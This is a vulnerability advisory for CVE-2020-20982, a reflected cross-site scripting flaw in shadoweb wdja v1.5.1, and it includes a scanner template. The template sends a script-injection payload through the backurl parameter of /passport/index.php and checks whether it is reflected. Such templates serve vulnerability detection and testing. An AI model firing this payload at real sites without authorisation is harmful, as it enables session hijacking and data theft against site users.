CVE-2020-20982: shadoweb wdja v1.5.1 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: shadoweb wdja v1.5.1 | POC: 已公开

漏洞描述

shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php.

PoC代码[已公开]

id: CVE-2020-20982

info:
  name: shadoweb wdja v1.5.1 - Cross-Site Scripting
  author: pikpikcu,ritikchaddha
  severity: critical
  description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/shadoweb/wdja/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2020-20982
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
    cvss-score: 9.6
    cve-id: CVE-2020-20982
    cwe-id: CWE-79
    epss-score: 0.35604
    epss-percentile: 0.96961
    cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wdja
    product: wdja_cms
  tags: cve2020,cve,xss,wdja,shadoweb

http:
  - method: GET
    path:
      - "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "location.href='</script><script>alert(document.domain)</script>"
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c8353de4998e366ec6e0f5b593ee13c36d46933c755b682cb3bb60838dd15f780220683ab1d1bdf2dbb38b9e236be4057f2f64f4d552486803766e714bf65efb1343:922c64590222798bb761d5b6d8e72950